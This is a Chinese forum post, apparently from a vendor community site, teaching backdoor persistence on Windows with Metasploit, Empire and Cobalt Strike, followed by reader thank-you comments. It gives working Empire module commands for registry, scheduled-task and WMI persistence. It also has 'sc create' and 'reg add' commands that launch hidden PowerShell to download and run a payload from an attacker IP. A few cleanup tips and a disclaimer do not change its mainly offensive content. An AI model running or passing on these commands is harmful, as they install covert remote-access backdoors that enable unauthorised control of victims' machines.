【大白分享】渗透安全之渗透测试框架权限维持篇
  

山东_朱文鑫 70431人觉得有帮助

{{ttag.title}}
本帖最后由 山东_朱文鑫 于 2023-6-25 02:06 编辑

大家好,我是大白,如果你的生活已处于低谷,那就,大胆走,因为你怎样走都是在向上。依旧感谢各位小伙伴的一路支持与陪伴!!!!



*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取!!!!

今天分享大白的渗透安全之Windows命令文件传输方式篇,同样还是对于好多小伙伴来说,这个更加偏向于安服,总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要,我们可以一同研习一下渗透攻防的“魅力”。




在渗透安全的圈内,权限维持可是一个经久不衰的话题,也是各大安全厂商苦于钻研的根本,本次就讲一下三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。


MSF权限维持

使用MSF维持权限的前提是先获得一个meterpreter shell,通过meterpreter shell获取持久性shell的方法有两种:
Persistence模块

通过启动项启动(persistence)的方式,在目标机器上以反弹回连。




  1. -U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数;
  2. -X:设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限问题,会导致添加失败,后门将无法启动。
  3. -S:作为服务自动启动代理程序(具有SYSTEM权限)
复制代码


生成的相关文件位置 :

  1. # 后门文件位置:
  2. C:\Windows\Temp
  3. C:\Users\Administrator\AppData\Local\Temp
  4. # 注册表位置:
  5. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
  6. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
复制代码




Metsvc 模块

通过服务(metsvc)启动的方式,在目标机器启动后自启动一个服务,等待连接。



后门排查:目标主机上开启了一个Meterpreter服务。



Empire 权限维持

Empire的persistence模块提供了18种权限维持的方法,大致可以分为四类,即








注册表

  1. (Empire: agents) > agents
  2. (Empire: agents) > interact URL3FZBV
  3. (Empire: URL3FZBV) > usemodule persistence/elevated/registry*
  4. (Empire: powershell/persistence/elevated/registry) > set Listener test
  5. (Empire: powershell/persistence/elevated/registry) > execute
复制代码




因为是开机启动,所以会弹个黑框,之后还会弹出注册表添加的powershell启动项的框,在注册表位置如下:



计划任务

  1. (Empire: agents) > interact 9NZ2RWBC
  2. (Empire: 9NZ2RWBC) > usemodule persistence/elevated/schtasks*
  3. (Empire: powershell/persistence/elevated/schtasks) > set Listener test
  4. (Empire: powershell/persistence/elevated/schtasks) > set DailyTime 22:50
  5. (Empire: powershell/persistence/elevated/schtasks) > execute
复制代码




在任务计划程序库可以看到-任务为Updater-启动程序如下可以到为powershell




wmi

  1. (Empire: agents) > interact 9NZ2RWBC
  2. (Empire: 9NZ2RWBC) > usemodule persistence/elevated/wmi
  3. (Empire: powershell/persistence/elevated/wmi) > set Listener test
  4. (Empire: powershell/persistence/elevated/wmi) > run
复制代码




如何清除后门,最简单的方法就是使用Autoruns,选择WMI选项卡,右键就可以删除恶意后门。




Cobalt Strike权限维持

通过Cobalt Strike拿到一个shell,留后门的方法有很多,下面介绍两种比较常见的无文件、自启动后门。

从Cobalt Strike菜单栏,Attacks--Web Drive-by--Scaripted Web Delivery,生成powershell后门。



根据需要可以自己选择,填写所需参数默认端口是80(需要注意的就是不要使用重复端口),Type选择powershell。




点击Launch后,返回powershell远程下载执行命令。



服务器自启动后门

  1. sc create "Name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8080/a'))\""
  2. sc description  Name "Just For Test"   //设置服务的描述字符串
  3. sc config Name start= auto             //设置这个服务为自动启动
  4. net start Name                         //启动服务
复制代码


重启服务器后,成功返回一个shell。




注册表自启动

在windows启动项注册表里面添加一个木马程序路径,如:

  1. beacon>getsystem
  2. beacon>shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://IP地址:端口/a'))\"" /f
复制代码



账号注销后,重新登录,界面上会出现powershell快速闪过消失,成功返回shell。




注册表还有哪些键值可以设置为自启动:

  1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  2. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
复制代码


*本篇章将本着学习的态度进行分享,严禁用于个人非法行为以及黑产获取,网络不是法外之地!!!!


以上就是本次的渗透安全之Windows权限维持后门隐藏篇,一句忠告:业务备份一时不做一时爽,问题出现两行泪,感谢大佬们的参阅,此贴先到这里后续会带上更加实用的帖子,感谢大家!

励志分享超清壁纸语句~~:


与有肝胆人共事,从无字句处读书。——周恩来

好的今天就到这里,老样子,感谢各位大神的参阅,孩子为了挣豆子不容易,孩子家里穷没豆子吃饭了!!!

打赏鼓励作者,期待更多好文!

打赏
6人已打赏

এ塔铃独语别黄昏এ 发表于 2024-5-26 19:32
  
楼主分享的案例很实用,具有典型性
新手716814 发表于 2023-11-3 14:59
  
谢谢楼主分享,学习了。。。。
新手716814 发表于 2023-10-17 09:03
  


楼主分享的案例很实用,具有典型性
新手716814 发表于 2023-10-17 09:00
  
感谢楼主分享,学习一下
新手378833 发表于 2023-10-17 08:59
  
感谢楼主分享,学习一下
新手626351 发表于 2023-10-16 09:31
  
学习到了,有助于工作!
dhf 发表于 2023-9-30 21:34
  
感谢楼主的精彩分享,有助工作!!!
dhf 发表于 2023-9-23 11:33
  
感谢楼主的精彩分享,有助工作!!!
飞翔的苹果 发表于 2023-9-7 08:20
  
感谢楼主分享,努力学习中!!!!
发表新帖
热门标签
全部标签>
西北区每日一问
技术盲盒
安全效果
【 社区to talk】
技术笔记
干货满满
每日一问
信服课堂视频
GIF动图学习
新版本体验
技术咨询
2023技术争霸赛专题
功能体验
产品连连看
安装部署配置
通用技术
秒懂零信任
技术晨报
自助服务平台操作指引
原创分享
标准化排查
排障笔记本
玩转零信任
排障那些事
SDP百科
深信服技术支持平台
POC测试案例
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
每周精选
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
高手请过招
升级&主动服务
高频问题集锦
社区新周刊
全能先锋系列
云化安全能力

本版版主

7
20
6

发帖

粉丝

关注

本版达人

ggbang

本周建议达人

adds

本周提问达人